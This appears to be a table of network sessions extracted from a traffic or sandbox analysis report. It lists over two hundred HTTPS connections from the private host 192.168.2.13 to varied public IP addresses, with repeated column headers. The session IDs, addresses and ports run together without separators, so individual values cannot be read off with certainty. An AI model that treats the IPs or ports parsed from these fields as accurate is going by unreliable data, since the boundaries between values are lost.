                                    14785192.168.2.133790857.29.30.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14786192.168.2.134153490.99.105.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14787192.168.2.133496642.13.125.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14788192.168.2.1333990204.99.94.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14789192.168.2.1352070102.67.178.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14790192.168.2.135677620.11.241.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14791192.168.2.1345944217.37.178.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14792192.168.2.1358988102.254.2.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14793192.168.2.1339678201.3.35.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14794192.168.2.135073097.139.154.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14795192.168.2.1344888210.211.240.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14796192.168.2.135263695.163.81.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14797192.168.2.1333426151.27.114.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14798192.168.2.135794419.210.156.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14799192.168.2.13336548.27.37.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14800192.168.2.133603070.224.97.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14801192.168.2.1341676213.93.129.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14802192.168.2.1353272149.95.138.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14803192.168.2.1356010168.87.246.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14804192.168.2.135111463.239.14.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14805192.168.2.1342552183.53.235.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14806192.168.2.13474202.35.79.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14807192.168.2.1349472162.77.81.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14808192.168.2.1358030156.187.21.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14809192.168.2.1335192140.67.38.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14810192.168.2.1344642105.12.149.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14811192.168.2.135215088.60.202.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14812192.168.2.135745823.43.176.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14813192.168.2.135899224.69.119.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14814192.168.2.1347774180.160.131.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14815192.168.2.1347006104.110.216.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14816192.168.2.134455827.221.200.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14817192.168.2.1349116154.56.22.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14818192.168.2.1339598171.14.100.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14819192.168.2.133981493.86.144.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14820192.168.2.134444831.116.111.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14821192.168.2.1337122189.207.155.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14822192.168.2.135515843.106.99.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14823192.168.2.1352752143.222.153.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14824192.168.2.135968835.172.22.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14825192.168.2.1352324172.142.229.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14826192.168.2.1339884173.126.54.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14827192.168.2.1332966117.31.106.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14828192.168.2.1339068216.111.23.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14829192.168.2.13475668.240.160.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14830192.168.2.1358032148.158.90.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14831192.168.2.1340870168.200.10.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14832192.168.2.134429846.98.59.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14833192.168.2.1346506107.11.36.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14834192.168.2.1342646160.252.85.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14835192.168.2.1335644171.195.25.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14836192.168.2.135223072.192.119.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14837192.168.2.1357070144.109.64.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14838192.168.2.1339360204.145.89.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14839192.168.2.135530839.1.197.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14840192.168.2.1358578200.34.246.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14841192.168.2.1347896163.68.193.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14842192.168.2.1356590177.17.240.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14843192.168.2.1352886168.101.6.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14844192.168.2.1341472213.33.241.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14845192.168.2.1352448174.29.174.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14846192.168.2.1340338144.246.146.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14847192.168.2.1340754177.181.90.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14848192.168.2.1345824196.42.25.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14849192.168.2.134500073.81.131.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14850192.168.2.134569614.82.236.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14851192.168.2.135513673.97.127.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14852192.168.2.1354558106.52.172.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14853192.168.2.1341878177.170.75.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14854192.168.2.1339300102.184.82.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14855192.168.2.1352976163.195.156.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14856192.168.2.133708451.111.12.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14857192.168.2.133563274.18.62.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14858192.168.2.1335542177.224.253.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14859192.168.2.1338550150.135.197.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14860192.168.2.1347322141.185.17.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14861192.168.2.13438942.241.76.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14862192.168.2.1351578202.156.102.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14863192.168.2.1355616125.29.242.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14864192.168.2.1337990169.66.122.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14865192.168.2.1352098187.55.108.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14866192.168.2.1346562154.115.4.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14867192.168.2.1352480208.231.127.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14868192.168.2.1338092151.242.231.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14869192.168.2.135039851.9.65.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14870192.168.2.1353818202.228.14.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14871192.168.2.1335474189.100.96.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14872192.168.2.1339238151.109.204.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14873192.168.2.1343938161.240.35.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14874192.168.2.1339296157.71.16.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14875192.168.2.1334234212.80.134.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14876192.168.2.1346488189.101.53.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14877192.168.2.1355194149.32.195.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14878192.168.2.135190081.89.3.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14879192.168.2.135336884.226.75.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14880192.168.2.1356816103.141.118.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14881192.168.2.1341604192.189.26.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14882192.168.2.134796466.181.71.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14883192.168.2.1338242120.30.89.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14884192.168.2.135533637.37.173.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14885192.168.2.133298844.87.50.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14886192.168.2.1351044162.240.151.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14887192.168.2.1354004135.36.44.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14888192.168.2.133436871.69.237.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14889192.168.2.134081042.68.230.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14890192.168.2.1355430150.24.115.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14891192.168.2.1352250109.86.14.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14892192.168.2.134872494.60.8.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14893192.168.2.1359340112.48.106.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14894192.168.2.135265474.113.21.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14895192.168.2.1348028145.250.209.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14896192.168.2.1336468211.21.129.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14897192.168.2.135579488.109.30.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14898192.168.2.1358640143.2.235.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14899192.168.2.135411083.40.190.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14900192.168.2.1352942196.161.220.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14901192.168.2.135977031.157.235.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14902192.168.2.1340780202.11.140.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14903192.168.2.1334614141.251.252.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14904192.168.2.1341308108.154.51.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14905192.168.2.1359968125.198.117.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14906192.168.2.133509653.65.111.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14907192.168.2.1349344211.148.201.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14908192.168.2.1358676213.249.80.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14909192.168.2.1339308148.120.254.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14910192.168.2.1356200220.139.12.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14911192.168.2.1354466176.47.163.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14912192.168.2.135602290.24.138.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14913192.168.2.1345852106.112.135.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14914192.168.2.133910473.25.210.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14915192.168.2.1344342124.250.135.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14916192.168.2.1336708103.101.137.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14917192.168.2.1333410108.193.164.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14918192.168.2.1334262144.126.86.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14919192.168.2.135172694.8.235.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14920192.168.2.133858662.181.109.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14921192.168.2.1341294109.104.158.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14922192.168.2.1349506138.253.16.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14923192.168.2.1342928122.5.104.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14924192.168.2.133640036.227.141.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14925192.168.2.133660662.186.171.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14926192.168.2.1344284113.151.113.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14927192.168.2.135455862.11.56.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14928192.168.2.1359806123.242.32.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14929192.168.2.1342116164.28.209.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14930192.168.2.1351250190.243.94.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14931192.168.2.133567046.103.69.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14932192.168.2.1348930163.23.208.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14933192.168.2.134071480.102.16.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14934192.168.2.135807447.28.55.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14935192.168.2.1338584218.216.237.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14936192.168.2.133969890.142.41.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14937192.168.2.1346510219.44.164.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14938192.168.2.1333644199.31.212.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14939192.168.2.1338736170.138.36.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14940192.168.2.133521818.220.59.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14941192.168.2.13604685.210.192.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14942192.168.2.133896287.133.140.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14943192.168.2.134851864.7.100.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14944192.168.2.135114660.29.20.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14945192.168.2.1343292130.157.5.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14946192.168.2.1342008153.100.245.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14947192.168.2.1350794101.180.57.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14948192.168.2.135720259.229.40.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14949192.168.2.134509282.38.254.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14950192.168.2.1342668108.157.32.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14951192.168.2.1351580103.28.248.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14952192.168.2.1351180110.253.113.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14953192.168.2.1347826144.93.176.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14954192.168.2.134112618.116.19.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14955192.168.2.1348172137.92.65.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14956192.168.2.1337796117.132.114.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14957192.168.2.1356912122.247.164.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14958192.168.2.1334402117.132.120.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14959192.168.2.1358948161.116.197.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14960192.168.2.1360350197.236.242.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14961192.168.2.136010647.99.158.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14962192.168.2.1340648201.101.245.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14963192.168.2.134319270.148.133.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14964192.168.2.1358260173.167.15.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14965192.168.2.1334984165.75.74.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14966192.168.2.1334620101.103.53.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14967192.168.2.1340622115.109.108.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14968192.168.2.135561041.187.19.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14969192.168.2.1353592206.162.111.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14970192.168.2.135273099.89.113.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14971192.168.2.1346884171.0.246.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14972192.168.2.133518827.190.190.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14973192.168.2.135398893.192.105.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14974192.168.2.134794436.41.214.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14975192.168.2.135152450.55.31.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14976192.168.2.1346604103.246.239.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14977192.168.2.135419619.194.164.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14978192.168.2.13422628.223.126.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14979192.168.2.1342172131.205.16.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14980192.168.2.1334564159.96.91.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14981192.168.2.134688868.118.195.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14982192.168.2.135209653.108.184.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14983192.168.2.1338666191.59.37.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14984192.168.2.133623457.130.10.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14985192.168.2.135372066.63.136.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14986192.168.2.1341786185.54.116.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14987192.168.2.134846296.213.172.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14988192.168.2.1335550101.22.139.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14989192.168.2.1348918172.207.218.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14990192.168.2.1342356141.192.185.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14991192.168.2.1360480150.11.128.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14992192.168.2.134380446.135.20.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14993192.168.2.134345249.222.128.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14994192.168.2.1346306106.24.241.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14995192.168.2.1348696105.141.166.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14996192.168.2.1360878105.212.51.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14997192.168.2.13460905.103.75.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14998192.168.2.1341476221.253.39.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14999192.168.2.13440181.187.212.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15000192.168.2.1347458212.44.219.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15001192.168.2.1346374136.225.53.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15002192.168.2.1346642191.112.32.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15003192.168.2.1352244191.44.191.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15004192.168.2.135023453.154.225.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15005192.168.2.134802432.59.71.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15006192.168.2.1354420187.115.213.35443
                                    TimestampBytes transferredDirectionData


